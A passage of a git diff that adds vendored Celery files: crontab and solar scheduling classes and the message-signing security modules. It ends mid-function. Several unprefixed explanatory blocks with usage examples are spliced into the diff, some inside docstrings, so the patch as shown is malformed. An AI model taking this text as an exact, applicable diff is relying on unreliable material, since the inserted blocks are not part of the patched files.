+SOLAR_INVALID_LATITUDE = """\
+Argument latitude {lat} is invalid, must be between -90 and 90.\
+"""
+
+SOLAR_INVALID_LONGITUDE = """\
+Argument longitude {lon} is invalid, must be between -180 and 180.\
+"""
+
+SOLAR_INVALID_EVENT = """\
+Argument event "{event}" is invalid, must be one of {all_events}.\
+"""
+
+
+def cronfield(s: str) -> str:
+    return '*' if s is None else s
+
+
+class ParseException(Exception):
+    """Raised by :class:`crontab_parser` when the input can't be parsed."""
+
+
+class BaseSchedule:
+
+    def __init__(self, nowfun: Callable | None = None, app: Celery | None = None):
+        self.nowfun = nowfun
+        self._app = app
+
+    def now(self) -> datetime:
+        return (self.nowfun or self.app.now)()
+
+    def remaining_estimate(self, last_run_at: datetime) -> timedelta:
+        raise NotImplementedError()
+
+    def is_due(self, last_run_at: datetime) -> tuple[bool, datetime]:
+        raise NotImplementedError()
+
+    def maybe_make_aware(
+            self, dt: datetime, naive_as_utc: bool = True) -> datetime:
+        return maybe_make_aware(dt, self.tz, naive_as_utc=naive_as_utc)
+
+    @property
+    def app(self) -> Celery:
+        return self._app or current_app._get_current_object()
+
+    @app.setter
+    def app(self, app: Celery) -> None:
+        self._app = app
+
+    @cached_property
+    def tz(self) -> tzinfo:
+        return self.app.timezone
+
+    @cached_property
+    def utc_enabled(self) -> bool:
+        return self.app.conf.enable_utc
+
+    def to_local(self, dt: datetime) -> datetime:
+        if not self.utc_enabled:
+            return timezone.to_local_fallback(dt)
+        return dt
+
+    def __eq__(self, other: Any) -> bool:
+        if isinstance(other, BaseSchedule):
+            return other.nowfun == self.nowfun
+        return NotImplemented
+
+
+class schedule(BaseSchedule):
+    """Schedule for periodic task.
+
+    Arguments:
+        run_every (float, ~datetime.timedelta): Time interval.
+        relative (bool): If set to True the run time will be rounded to the
+            resolution of the interval.
+        nowfun (Callable): Function returning the current date and time
+            (:class:`~datetime.datetime`).
+        app (Celery): Celery app instance.
+    """
+
+    relative: bool = False
+
+    def __init__(self, run_every: float | timedelta | None = None,
+                 relative: bool = False, nowfun: Callable | None = None, app: Celery
+                 | None = None) -> None:
+        self.run_every = maybe_timedelta(run_every)
+        self.relative = relative
+        super().__init__(nowfun=nowfun, app=app)
+
+    def remaining_estimate(self, last_run_at: datetime) -> timedelta:
+        return remaining(
+            self.maybe_make_aware(last_run_at), self.run_every,
+            self.maybe_make_aware(self.now()), self.relative,
+        )
+
+    def is_due(self, last_run_at: datetime) -> tuple[bool, datetime]:
+        """Return tuple of ``(is_due, next_time_to_check)``.
+
+        Notes:
+            - next time to check is in seconds.
+
+            - ``(True, 20)``, means the task should be run now, and the next
+              time to check is in 20 seconds.
+
+            - ``(False, 12.3)``, means the task is not due, but that the
+              scheduler should check again in 12.3 seconds.
+
+        The next time to check is used to save energy/CPU cycles,
+        it does not need to be accurate but will influence the precision
+        of your schedule.  You must also keep in mind
+        the value of :setting:`beat_max_loop_interval`,
+        that decides the maximum number of seconds the scheduler can
+        sleep between re-checking the periodic task intervals.  So if you
+        have a task that changes schedule at run-time then your next_run_at
+        check will decide how long it will take before a change to the
+        schedule takes effect.  The max loop interval takes precedence
+        over the next check at value returned.
+
+        .. admonition:: Scheduler max interval variance
+
+            The default max loop interval may vary for different schedulers.
+            For the default scheduler the value is 5 minutes, but for example
+            the :pypi:`django-celery-beat` database scheduler the value
+            is 5 seconds.
+        """
+        last_run_at = self.maybe_make_aware(last_run_at)
+        rem_delta = self.remaining_estimate(last_run_at)
+        remaining_s = max(rem_delta.total_seconds(), 0)
+        if remaining_s == 0:
+            return schedstate(is_due=True, next=self.seconds)
+        return schedstate(is_due=False, next=remaining_s)
+
+    def __repr__(self) -> str:
+        return f'<freq: {self.human_seconds}>'
+
+    def __eq__(self, other: Any) -> bool:
+        if isinstance(other, schedule):
+            return self.run_every == other.run_every
+        return self.run_every == other
+
+    def __reduce__(self) -> tuple[type,
+                                  tuple[timedelta, bool, Callable | None]]:
+        return self.__class__, (self.run_every, self.relative, self.nowfun)
+
+    @property
+    def seconds(self) -> int | float:
+        return max(self.run_every.total_seconds(), 0)
+
+    @property
+    def human_seconds(self) -> str:
+        return humanize_seconds(self.seconds)
+
+
+class crontab_parser:
+    """Parser for Crontab expressions.
+
+    Any expression of the form 'groups'
+    (see BNF grammar below) is accepted and expanded to a set of numbers.
+    These numbers represent the units of time that the Crontab needs to
+    run on:
+
+    .. code-block:: bnf
+
+        digit   :: '0'..'9'
+        dow     :: 'a'..'z'
+        number  :: digit+ | dow+
+        steps   :: number
+        range   :: number ( '-' number ) ?
+        numspec :: '*' | range
+        expr    :: numspec ( '/' steps ) ?
+        groups  :: expr ( ',' expr ) *
+
+    The parser is a general purpose one, useful for parsing hours, minutes and
+    day of week expressions.  Example usage:
+
+    ..
code-block:: pycon + + >>> minutes = crontab_parser(60).parse('*/15') + [0, 15, 30, 45] + >>> hours = crontab_parser(24).parse('*/4') + [0, 4, 8, 12, 16, 20] + >>> day_of_week = crontab_parser(7).parse('*') + [0, 1, 2, 3, 4, 5, 6] + + It can also parse day of month and month of year expressions if initialized + with a minimum of 1. Example usage: + + .. code-block:: pycon + + >>> days_of_month = crontab_parser(31, 1).parse('*/3') + [1, 4, 7, 10, 13, 16, 19, 22, 25, 28, 31] + >>> months_of_year = crontab_parser(12, 1).parse('*/2') + [1, 3, 5, 7, 9, 11] + >>> months_of_year = crontab_parser(12, 1).parse('2-12/2') + [2, 4, 6, 8, 10, 12] + + The maximum possible expanded value returned is found by the formula: + + :math:`max_ + min_ - 1` + """ + + ParseException = ParseException + + _range = r'(\w+?)-(\w+)' + _steps = r'/(\w+)?' + _star = r'\*' + + def __init__(self, max_: int = 60, min_: int = 0): + self.max_ = max_ + self.min_ = min_ + self.pats: tuple[tuple[re.Pattern, Callable], ...] = ( + (re.compile(self._range + self._steps), self._range_steps), + (re.compile(self._range), self._expand_range), + (re.compile(self._star + self._steps), self._star_steps), + (re.compile('^' + self._star + '$'), self._expand_star), + ) + + def parse(self, spec: str) -> set[int]: + acc = set() + for part in spec.split(','): + if not part: + raise self.ParseException('empty part') + acc |= set(self._parse_part(part)) + return acc + + def _parse_part(self, part: str) -> list[int]: + for regex, handler in self.pats: + m = regex.match(part) + if m: + return handler(m.groups()) + return self._expand_range((part,)) + + def _expand_range(self, toks: Sequence[str]) -> list[int]: + fr = self._expand_number(toks[0]) + if len(toks) > 1: + to = self._expand_number(toks[1]) + if to < fr: # Wrap around max_ if necessary + return (list(range(fr, self.min_ + self.max_)) + + list(range(self.min_, to + 1))) + return list(range(fr, to + 1)) + return [fr] + + def _range_steps(self, toks: Sequence[str]) -> list[int]: + if len(toks) != 3 or not toks[2]: + raise self.ParseException('empty filter') + return self._expand_range(toks[:2])[::int(toks[2])] + + def _star_steps(self, toks: Sequence[str]) -> list[int]: + if not toks or not toks[0]: + raise self.ParseException('empty filter') + return self._expand_star()[::int(toks[0])] + + def _expand_star(self, *args: Any) -> list[int]: + return list(range(self.min_, self.max_ + self.min_)) + + def _expand_number(self, s: str) -> int: + if isinstance(s, str) and s[0] == '-': + raise self.ParseException('negative numbers not supported') + try: + i = int(s) + except ValueError: + try: + i = weekday(s) + except KeyError: + raise ValueError(f'Invalid weekday literal {s!r}.') + + max_val = self.min_ + self.max_ - 1 + if i > max_val: + raise ValueError( + f'Invalid end range: {i} > {max_val}.') + if i < self.min_: + raise ValueError( + f'Invalid beginning range: {i} < {self.min_}.') + + return i + + +class crontab(BaseSchedule): + """Crontab schedule. + + A Crontab can be used as the ``run_every`` value of a + periodic task entry to add :manpage:`crontab(5)`-like scheduling. + + Like a :manpage:`cron(5)`-job, you can specify units of time of when + you'd like the task to execute. It's a reasonably complete + implementation of :command:`cron`'s features, so it should provide a fair + degree of scheduling needs. + + You can specify a minute, an hour, a day of the week, a day of the + month, and/or a month in the year in any of the following formats: + + .. 
attribute:: minute + + - A (list of) integers from 0-59 that represent the minutes of + an hour of when execution should occur; or + - A string representing a Crontab pattern. This may get pretty + advanced, like ``minute='*/15'`` (for every quarter) or + ``minute='1,13,30-45,50-59/2'``. + + .. attribute:: hour + + - A (list of) integers from 0-23 that represent the hours of + a day of when execution should occur; or + - A string representing a Crontab pattern. This may get pretty + advanced, like ``hour='*/3'`` (for every three hours) or + ``hour='0,8-17/2'`` (at midnight, and every two hours during + office hours). + + .. attribute:: day_of_week + + - A (list of) integers from 0-6, where Sunday = 0 and Saturday = + 6, that represent the days of a week that execution should + occur. + - A string representing a Crontab pattern. This may get pretty + advanced, like ``day_of_week='mon-fri'`` (for weekdays only). + (Beware that ``day_of_week='*/2'`` does not literally mean + 'every two days', but 'every day that is divisible by two'!) + + .. attribute:: day_of_month + + - A (list of) integers from 1-31 that represents the days of the + month that execution should occur. + - A string representing a Crontab pattern. This may get pretty + advanced, such as ``day_of_month='2-30/2'`` (for every even + numbered day) or ``day_of_month='1-7,15-21'`` (for the first and + third weeks of the month). + + .. attribute:: month_of_year + + - A (list of) integers from 1-12 that represents the months of + the year during which execution can occur. + - A string representing a Crontab pattern. This may get pretty + advanced, such as ``month_of_year='*/3'`` (for the first month + of every quarter) or ``month_of_year='2-12/2'`` (for every even + numbered month). + + .. attribute:: nowfun + + Function returning the current date and time + (:class:`~datetime.datetime`). + + .. attribute:: app + + The Celery app instance. + + It's important to realize that any day on which execution should + occur must be represented by entries in all three of the day and + month attributes. For example, if ``day_of_week`` is 0 and + ``day_of_month`` is every seventh day, only months that begin + on Sunday and are also in the ``month_of_year`` attribute will have + execution events. Or, ``day_of_week`` is 1 and ``day_of_month`` + is '1-7,15-21' means every first and third Monday of every month + present in ``month_of_year``. + """ + + def __init__(self, minute: str = '*', hour: str = '*', day_of_week: str = '*', + day_of_month: str = '*', month_of_year: str = '*', **kwargs: Any) -> None: + self._orig_minute = cronfield(minute) + self._orig_hour = cronfield(hour) + self._orig_day_of_week = cronfield(day_of_week) + self._orig_day_of_month = cronfield(day_of_month) + self._orig_month_of_year = cronfield(month_of_year) + self._orig_kwargs = kwargs + self.hour = self._expand_cronspec(hour, 24) + self.minute = self._expand_cronspec(minute, 60) + self.day_of_week = self._expand_cronspec(day_of_week, 7) + self.day_of_month = self._expand_cronspec(day_of_month, 31, 1) + self.month_of_year = self._expand_cronspec(month_of_year, 12, 1) + super().__init__(**kwargs) + + @staticmethod + def _expand_cronspec( + cronspec: int | str | Iterable, + max_: int, min_: int = 0) -> set[Any]: + """Expand cron specification. + + Takes the given cronspec argument in one of the forms: + + .. 
code-block:: text + + int (like 7) + str (like '3-5,*/15', '*', or 'monday') + set (like {0,15,30,45} + list (like [8-17]) + + And convert it to an (expanded) set representing all time unit + values on which the Crontab triggers. Only in case of the base + type being :class:`str`, parsing occurs. (It's fast and + happens only once for each Crontab instance, so there's no + significant performance overhead involved.) + + For the other base types, merely Python type conversions happen. + + The argument ``max_`` is needed to determine the expansion of + ``*`` and ranges. The argument ``min_`` is needed to determine + the expansion of ``*`` and ranges for 1-based cronspecs, such as + day of month or month of year. The default is sufficient for minute, + hour, and day of week. + """ + if isinstance(cronspec, int): + result = {cronspec} + elif isinstance(cronspec, str): + result = crontab_parser(max_, min_).parse(cronspec) + elif isinstance(cronspec, set): + result = cronspec + elif isinstance(cronspec, Iterable): + result = set(cronspec) # type: ignore + else: + raise TypeError(CRON_INVALID_TYPE.format(type=type(cronspec))) + + # assure the result does not precede the min or exceed the max + for number in result: + if number >= max_ + min_ or number < min_: + raise ValueError(CRON_PATTERN_INVALID.format( + min=min_, max=max_ - 1 + min_, value=number)) + return result + + def _delta_to_next(self, last_run_at: datetime, next_hour: int, + next_minute: int) -> ffwd: + """Find next delta. + + Takes a :class:`~datetime.datetime` of last run, next minute and hour, + and returns a :class:`~celery.utils.time.ffwd` for the next + scheduled day and time. + + Only called when ``day_of_month`` and/or ``month_of_year`` + cronspec is specified to further limit scheduled task execution. 
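
The expansion described above can be observed directly on a ``crontab`` instance; each attribute holds the full set of matching time unit values, for example:

.. code-block:: python

    from celery.schedules import crontab

    c = crontab(minute='*/15', hour='0,8-17/2', day_of_month='1-7,15-21')
    sorted(c.minute)        # [0, 15, 30, 45]
    sorted(c.hour)          # [0, 8, 10, 12, 14, 16]
    sorted(c.day_of_month)  # [1, 2, 3, 4, 5, 6, 7, 15, 16, 17, 18, 19, 20, 21]
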
+ """ + datedata = AttributeDict(year=last_run_at.year) + days_of_month = sorted(self.day_of_month) + months_of_year = sorted(self.month_of_year) + + def day_out_of_range(year: int, month: int, day: int) -> bool: + try: + datetime(year=year, month=month, day=day) + except ValueError: + return True + return False + + def is_before_last_run(year: int, month: int, day: int) -> bool: + return self.maybe_make_aware( + datetime(year, month, day, next_hour, next_minute), + naive_as_utc=False) < last_run_at + + def roll_over() -> None: + for _ in range(2000): + flag = (datedata.dom == len(days_of_month) or + day_out_of_range(datedata.year, + months_of_year[datedata.moy], + days_of_month[datedata.dom]) or + (is_before_last_run(datedata.year, + months_of_year[datedata.moy], + days_of_month[datedata.dom]))) + + if flag: + datedata.dom = 0 + datedata.moy += 1 + if datedata.moy == len(months_of_year): + datedata.moy = 0 + datedata.year += 1 + else: + break + else: + # Tried 2000 times, we're most likely in an infinite loop + raise RuntimeError('unable to rollover, ' + 'time specification is probably invalid') + + if last_run_at.month in self.month_of_year: + datedata.dom = bisect(days_of_month, last_run_at.day) + datedata.moy = bisect_left(months_of_year, last_run_at.month) + else: + datedata.dom = 0 + datedata.moy = bisect(months_of_year, last_run_at.month) + if datedata.moy == len(months_of_year): + datedata.moy = 0 + roll_over() + + while 1: + th = datetime(year=datedata.year, + month=months_of_year[datedata.moy], + day=days_of_month[datedata.dom]) + if th.isoweekday() % 7 in self.day_of_week: + break + datedata.dom += 1 + roll_over() + + return ffwd(year=datedata.year, + month=months_of_year[datedata.moy], + day=days_of_month[datedata.dom], + hour=next_hour, + minute=next_minute, + second=0, + microsecond=0) + + def __repr__(self) -> str: + return CRON_REPR.format(self) + + def __reduce__(self) -> tuple[type, tuple[str, str, str, str, str], Any]: + return (self.__class__, (self._orig_minute, + self._orig_hour, + self._orig_day_of_week, + self._orig_day_of_month, + self._orig_month_of_year), self._orig_kwargs) + + def __setstate__(self, state: Mapping[str, Any]) -> None: + # Calling super's init because the kwargs aren't necessarily passed in + # the same form as they are stored by the superclass + super().__init__(**state) + + def remaining_delta(self, last_run_at: datetime, tz: tzinfo | None = None, + ffwd: type = ffwd) -> tuple[datetime, Any, datetime]: + # caching global ffwd + last_run_at = self.maybe_make_aware(last_run_at) + now = self.maybe_make_aware(self.now()) + dow_num = last_run_at.isoweekday() % 7 # Sunday is day 0, not day 7 + + execute_this_date = ( + last_run_at.month in self.month_of_year and + last_run_at.day in self.day_of_month and + dow_num in self.day_of_week + ) + + execute_this_hour = ( + execute_this_date and + last_run_at.day == now.day and + last_run_at.month == now.month and + last_run_at.year == now.year and + last_run_at.hour in self.hour and + last_run_at.minute < max(self.minute) + ) + + if execute_this_hour: + next_minute = min(minute for minute in self.minute + if minute > last_run_at.minute) + delta = ffwd(minute=next_minute, second=0, microsecond=0) + else: + next_minute = min(self.minute) + execute_today = (execute_this_date and + last_run_at.hour < max(self.hour)) + + if execute_today: + next_hour = min(hour for hour in self.hour + if hour > last_run_at.hour) + delta = ffwd(hour=next_hour, minute=next_minute, + second=0, microsecond=0) + else: + next_hour = 
min(self.hour) + all_dom_moy = (self._orig_day_of_month == '*' and + self._orig_month_of_year == '*') + if all_dom_moy: + next_day = min([day for day in self.day_of_week + if day > dow_num] or self.day_of_week) + add_week = next_day == dow_num + + delta = ffwd( + weeks=add_week and 1 or 0, + weekday=(next_day - 1) % 7, + hour=next_hour, + minute=next_minute, + second=0, + microsecond=0, + ) + else: + delta = self._delta_to_next(last_run_at, + next_hour, next_minute) + return self.to_local(last_run_at), delta, self.to_local(now) + + def remaining_estimate( + self, last_run_at: datetime, ffwd: type = ffwd) -> timedelta: + """Estimate of next run time. + + Returns when the periodic task should run next as a + :class:`~datetime.timedelta`. + """ + # pylint: disable=redefined-outer-name + # caching global ffwd + return remaining(*self.remaining_delta(last_run_at, ffwd=ffwd)) + + def is_due(self, last_run_at: datetime) -> tuple[bool, datetime]: + """Return tuple of ``(is_due, next_time_to_run)``. + + If :setting:`beat_cron_starting_deadline` has been specified, the + scheduler will make sure that the `last_run_at` time is within the + deadline. This prevents tasks that could have been run according to + the crontab, but didn't, from running again unexpectedly. + + Note: + Next time to run is in seconds. + + SeeAlso: + :meth:`celery.schedules.schedule.is_due` for more information. + """ + + rem_delta = self.remaining_estimate(last_run_at) + rem_secs = rem_delta.total_seconds() + rem = max(rem_secs, 0) + due = rem == 0 + + deadline_secs = self.app.conf.beat_cron_starting_deadline + has_passed_deadline = False + if deadline_secs is not None: + # Make sure we're looking at the latest possible feasible run + # date when checking the deadline. + last_date_checked = last_run_at + last_feasible_rem_secs = rem_secs + while rem_secs < 0: + last_date_checked = last_date_checked + abs(rem_delta) + rem_delta = self.remaining_estimate(last_date_checked) + rem_secs = rem_delta.total_seconds() + if rem_secs < 0: + last_feasible_rem_secs = rem_secs + + # if rem_secs becomes 0 or positive, second-to-last + # last_date_checked must be the last feasible run date. + # Check if the last feasible date is within the deadline + # for running + has_passed_deadline = -last_feasible_rem_secs > deadline_secs + if has_passed_deadline: + # Should not be due if we've passed the deadline for looking + # at past runs + due = False + + if due or has_passed_deadline: + rem_delta = self.remaining_estimate(self.now()) + rem = max(rem_delta.total_seconds(), 0) + return schedstate(due, rem) + + def __eq__(self, other: Any) -> bool: + if isinstance(other, crontab): + return ( + other.month_of_year == self.month_of_year and + other.day_of_month == self.day_of_month and + other.day_of_week == self.day_of_week and + other.hour == self.hour and + other.minute == self.minute and + super().__eq__(other) + ) + return NotImplemented + + +def maybe_schedule( + s: int | float | timedelta | BaseSchedule, relative: bool = False, + app: Celery | None = None) -> float | timedelta | BaseSchedule: + """Return schedule from number, timedelta, or actual schedule.""" + if s is not None: + if isinstance(s, (float, int)): + s = timedelta(seconds=s) + if isinstance(s, timedelta): + return schedule(s, relative, app=app) + else: + s.app = app + return s + + +class solar(BaseSchedule): + """Solar event. + + A solar event can be used as the ``run_every`` value of a + periodic task entry to schedule based on certain solar events. 
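
As a usage sketch, a ``crontab`` normally ends up as the ``schedule`` value of a beat entry, and the scheduler drives it through ``is_due``/``remaining_estimate``. The ``app`` instance and the ``tasks.send_report`` task name below are assumptions for illustration only.

.. code-block:: python

    from datetime import datetime, timezone
    from celery.schedules import crontab

    app.conf.beat_schedule = {
        'weekday-morning-report': {
            'task': 'tasks.send_report',
            'schedule': crontab(minute=30, hour=7, day_of_week='mon-fri'),
        },
    }

    # roughly what beat does on every tick:
    c = crontab(minute='*/15')
    c.is_due(datetime.now(timezone.utc))   # schedstate(is_due=..., next=<seconds>)
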
+ + Notes: + + Available event values are: + + - ``dawn_astronomical`` + - ``dawn_nautical`` + - ``dawn_civil`` + - ``sunrise`` + - ``solar_noon`` + - ``sunset`` + - ``dusk_civil`` + - ``dusk_nautical`` + - ``dusk_astronomical`` + + Arguments: + event (str): Solar event that triggers this task. + See note for available values. + lat (float): The latitude of the observer. + lon (float): The longitude of the observer. + nowfun (Callable): Function returning the current date and time + as a class:`~datetime.datetime`. + app (Celery): Celery app instance. + """ + + _all_events = { + 'dawn_astronomical', + 'dawn_nautical', + 'dawn_civil', + 'sunrise', + 'solar_noon', + 'sunset', + 'dusk_civil', + 'dusk_nautical', + 'dusk_astronomical', + } + _horizons = { + 'dawn_astronomical': '-18', + 'dawn_nautical': '-12', + 'dawn_civil': '-6', + 'sunrise': '-0:34', + 'solar_noon': '0', + 'sunset': '-0:34', + 'dusk_civil': '-6', + 'dusk_nautical': '-12', + 'dusk_astronomical': '18', + } + _methods = { + 'dawn_astronomical': 'next_rising', + 'dawn_nautical': 'next_rising', + 'dawn_civil': 'next_rising', + 'sunrise': 'next_rising', + 'solar_noon': 'next_transit', + 'sunset': 'next_setting', + 'dusk_civil': 'next_setting', + 'dusk_nautical': 'next_setting', + 'dusk_astronomical': 'next_setting', + } + _use_center_l = { + 'dawn_astronomical': True, + 'dawn_nautical': True, + 'dawn_civil': True, + 'sunrise': False, + 'solar_noon': False, + 'sunset': False, + 'dusk_civil': True, + 'dusk_nautical': True, + 'dusk_astronomical': True, + } + + def __init__(self, event: str, lat: int | float, lon: int | float, ** + kwargs: Any) -> None: + self.ephem = __import__('ephem') + self.event = event + self.lat = lat + self.lon = lon + super().__init__(**kwargs) + + if event not in self._all_events: + raise ValueError(SOLAR_INVALID_EVENT.format( + event=event, all_events=', '.join(sorted(self._all_events)), + )) + if lat < -90 or lat > 90: + raise ValueError(SOLAR_INVALID_LATITUDE.format(lat=lat)) + if lon < -180 or lon > 180: + raise ValueError(SOLAR_INVALID_LONGITUDE.format(lon=lon)) + + cal = self.ephem.Observer() + cal.lat = str(lat) + cal.lon = str(lon) + cal.elev = 0 + cal.horizon = self._horizons[event] + cal.pressure = 0 + self.cal = cal + + self.method = self._methods[event] + self.use_center = self._use_center_l[event] + + def __reduce__(self) -> tuple[type, tuple[str, int | float, int | float]]: + return self.__class__, (self.event, self.lat, self.lon) + + def __repr__(self) -> str: + return ''.format( + self.event, self.lat, self.lon, + ) + + def remaining_estimate(self, last_run_at: datetime) -> timedelta: + """Return estimate of next time to run. + + Returns: + ~datetime.timedelta: when the periodic task should + run next, or if it shouldn't run today (e.g., the sun does + not rise today), returns the time when the next check + should take place. + """ + last_run_at = self.maybe_make_aware(last_run_at) + last_run_at_utc = localize(last_run_at, timezone.utc) + self.cal.date = last_run_at_utc + try: + if self.use_center: + next_utc = getattr(self.cal, self.method)( + self.ephem.Sun(), + start=last_run_at_utc, use_center=self.use_center + ) + else: + next_utc = getattr(self.cal, self.method)( + self.ephem.Sun(), start=last_run_at_utc + ) + + except self.ephem.CircumpolarError: # pragma: no cover + # Sun won't rise/set today. Check again tomorrow + # (specifically, after the next anti-transit). 
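
For context, a ``solar`` schedule is used like any other schedule in a beat entry; it requires the :pypi:`ephem` package, and the ``app`` instance and task name below are placeholders:

.. code-block:: python

    from celery.schedules import solar

    app.conf.beat_schedule = {
        'dim-lights-at-sunset': {
            'task': 'tasks.dim_lights',
            # latitude/longitude of the observer (here: roughly Melbourne)
            'schedule': solar('sunset', -37.81753, 144.96715),
        },
    }
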
+ next_utc = ( + self.cal.next_antitransit(self.ephem.Sun()) + + timedelta(minutes=1) + ) + next = self.maybe_make_aware(next_utc.datetime()) + now = self.maybe_make_aware(self.now()) + delta = next - now + return delta + + def is_due(self, last_run_at: datetime) -> tuple[bool, datetime]: + """Return tuple of ``(is_due, next_time_to_run)``. + + Note: + next time to run is in seconds. + + See Also: + :meth:`celery.schedules.schedule.is_due` for more information. + """ + rem_delta = self.remaining_estimate(last_run_at) + rem = max(rem_delta.total_seconds(), 0) + due = rem == 0 + if due: + rem_delta = self.remaining_estimate(self.now()) + rem = max(rem_delta.total_seconds(), 0) + return schedstate(due, rem) + + def __eq__(self, other: Any) -> bool: + if isinstance(other, solar): + return ( + other.event == self.event and + other.lat == self.lat and + other.lon == self.lon + ) + return NotImplemented diff --git a/env/Lib/site-packages/celery/security/__init__.py b/env/Lib/site-packages/celery/security/__init__.py new file mode 100644 index 00000000..c801d98b --- /dev/null +++ b/env/Lib/site-packages/celery/security/__init__.py @@ -0,0 +1,74 @@ +"""Message Signing Serializer.""" +from kombu.serialization import disable_insecure_serializers as _disable_insecure_serializers +from kombu.serialization import registry + +from celery.exceptions import ImproperlyConfigured + +from .serialization import register_auth # : need cryptography first + +CRYPTOGRAPHY_NOT_INSTALLED = """\ +You need to install the cryptography library to use the auth serializer. +Please install by: + + $ pip install cryptography +""" + +SECURITY_SETTING_MISSING = """\ +Sorry, but you have to configure the + * security_key + * security_certificate, and the + * security_cert_store +configuration settings to use the auth serializer. + +Please see the configuration reference for more information. +""" + +SETTING_MISSING = """\ +You have to configure a special task serializer +for signing and verifying tasks: + * task_serializer = 'auth' + +You have to accept only tasks which are serialized with 'auth'. +There is no point in signing messages if they are not verified. 
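
The settings referred to in the messages above fit together roughly as follows; the paths are placeholders, the key and certificate files must exist, and an ``app`` instance is assumed:

.. code-block:: python

    app.conf.update(
        security_key='/etc/ssl/private/worker.key',
        security_certificate='/etc/ssl/certs/worker.pem',
        security_cert_store='/etc/ssl/certs/*.pem',
        task_serializer='auth',
        event_serializer='auth',
        accept_content=['auth'],
    )
    app.setup_security()   # registers the 'auth' serializer and makes it the default
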
+ * accept_content = ['auth'] +""" + +__all__ = ('setup_security',) + +try: + import cryptography # noqa +except ImportError: + raise ImproperlyConfigured(CRYPTOGRAPHY_NOT_INSTALLED) + + +def setup_security(allowed_serializers=None, key=None, key_password=None, cert=None, store=None, + digest=None, serializer='json', app=None): + """See :meth:`@Celery.setup_security`.""" + if app is None: + from celery import current_app + app = current_app._get_current_object() + + _disable_insecure_serializers(allowed_serializers) + + # check conf for sane security settings + conf = app.conf + if conf.task_serializer != 'auth' or conf.accept_content != ['auth']: + raise ImproperlyConfigured(SETTING_MISSING) + + key = key or conf.security_key + key_password = key_password or conf.security_key_password + cert = cert or conf.security_certificate + store = store or conf.security_cert_store + digest = digest or conf.security_digest + + if not (key and cert and store): + raise ImproperlyConfigured(SECURITY_SETTING_MISSING) + + with open(key) as kf: + with open(cert) as cf: + register_auth(kf.read(), key_password, cf.read(), store, digest, serializer) + registry._set_default_serializer('auth') + + +def disable_untrusted_serializers(whitelist=None): + _disable_insecure_serializers(allowed=whitelist) diff --git a/env/Lib/site-packages/celery/security/certificate.py b/env/Lib/site-packages/celery/security/certificate.py new file mode 100644 index 00000000..80398b39 --- /dev/null +++ b/env/Lib/site-packages/celery/security/certificate.py @@ -0,0 +1,113 @@ +"""X.509 certificates.""" +from __future__ import annotations + +import datetime +import glob +import os +from typing import TYPE_CHECKING, Iterator + +from cryptography.hazmat.backends import default_backend +from cryptography.hazmat.primitives.asymmetric import padding, rsa +from cryptography.x509 import load_pem_x509_certificate +from kombu.utils.encoding import bytes_to_str, ensure_bytes + +from celery.exceptions import SecurityError + +from .utils import reraise_errors + +if TYPE_CHECKING: + from cryptography.hazmat.primitives.asymmetric.dsa import DSAPublicKey + from cryptography.hazmat.primitives.asymmetric.ec import EllipticCurvePublicKey + from cryptography.hazmat.primitives.asymmetric.ed448 import Ed448PublicKey + from cryptography.hazmat.primitives.asymmetric.ed25519 import Ed25519PublicKey + from cryptography.hazmat.primitives.asymmetric.rsa import RSAPublicKey + from cryptography.hazmat.primitives.asymmetric.utils import Prehashed + from cryptography.hazmat.primitives.hashes import HashAlgorithm + + +__all__ = ('Certificate', 'CertStore', 'FSCertStore') + + +class Certificate: + """X.509 certificate.""" + + def __init__(self, cert: str) -> None: + with reraise_errors( + 'Invalid certificate: {0!r}', errors=(ValueError,) + ): + self._cert = load_pem_x509_certificate( + ensure_bytes(cert), backend=default_backend()) + + if not isinstance(self._cert.public_key(), rsa.RSAPublicKey): + raise ValueError("Non-RSA certificates are not supported.") + + def has_expired(self) -> bool: + """Check if the certificate has expired.""" + return datetime.datetime.utcnow() >= self._cert.not_valid_after + + def get_pubkey(self) -> ( + DSAPublicKey | EllipticCurvePublicKey | Ed448PublicKey | Ed25519PublicKey | RSAPublicKey + ): + return self._cert.public_key() + + def get_serial_number(self) -> int: + """Return the serial number in the certificate.""" + return self._cert.serial_number + + def get_issuer(self) -> str: + """Return issuer (CA) as a string.""" + return ' 
'.join(x.value for x in self._cert.issuer) + + def get_id(self) -> str: + """Serial number/issuer pair uniquely identifies a certificate.""" + return f'{self.get_issuer()} {self.get_serial_number()}' + + def verify(self, data: bytes, signature: bytes, digest: HashAlgorithm | Prehashed) -> None: + """Verify signature for string containing data.""" + with reraise_errors('Bad signature: {0!r}'): + + pad = padding.PSS( + mgf=padding.MGF1(digest), + salt_length=padding.PSS.MAX_LENGTH) + + self.get_pubkey().verify(signature, ensure_bytes(data), pad, digest) + + +class CertStore: + """Base class for certificate stores.""" + + def __init__(self) -> None: + self._certs: dict[str, Certificate] = {} + + def itercerts(self) -> Iterator[Certificate]: + """Return certificate iterator.""" + yield from self._certs.values() + + def __getitem__(self, id: str) -> Certificate: + """Get certificate by id.""" + try: + return self._certs[bytes_to_str(id)] + except KeyError: + raise SecurityError(f'Unknown certificate: {id!r}') + + def add_cert(self, cert: Certificate) -> None: + cert_id = bytes_to_str(cert.get_id()) + if cert_id in self._certs: + raise SecurityError(f'Duplicate certificate: {id!r}') + self._certs[cert_id] = cert + + +class FSCertStore(CertStore): + """File system certificate store.""" + + def __init__(self, path: str) -> None: + super().__init__() + if os.path.isdir(path): + path = os.path.join(path, '*') + for p in glob.glob(path): + with open(p) as f: + cert = Certificate(f.read()) + if cert.has_expired(): + raise SecurityError( + f'Expired certificate: {cert.get_id()!r}') + self.add_cert(cert) diff --git a/env/Lib/site-packages/celery/security/key.py b/env/Lib/site-packages/celery/security/key.py new file mode 100644 index 00000000..ae932b2b --- /dev/null +++ b/env/Lib/site-packages/celery/security/key.py @@ -0,0 +1,35 @@ +"""Private keys for the security serializer.""" +from cryptography.hazmat.backends import default_backend +from cryptography.hazmat.primitives import serialization +from cryptography.hazmat.primitives.asymmetric import padding, rsa +from kombu.utils.encoding import ensure_bytes + +from .utils import reraise_errors + +__all__ = ('PrivateKey',) + + +class PrivateKey: + """Represents a private key.""" + + def __init__(self, key, password=None): + with reraise_errors( + 'Invalid private key: {0!r}', errors=(ValueError,) + ): + self._key = serialization.load_pem_private_key( + ensure_bytes(key), + password=ensure_bytes(password), + backend=default_backend()) + + if not isinstance(self._key, rsa.RSAPrivateKey): + raise ValueError("Non-RSA keys are not supported.") + + def sign(self, data, digest): + """Sign string containing data.""" + with reraise_errors('Unable to sign data: {0!r}'): + + pad = padding.PSS( + mgf=padding.MGF1(digest), + 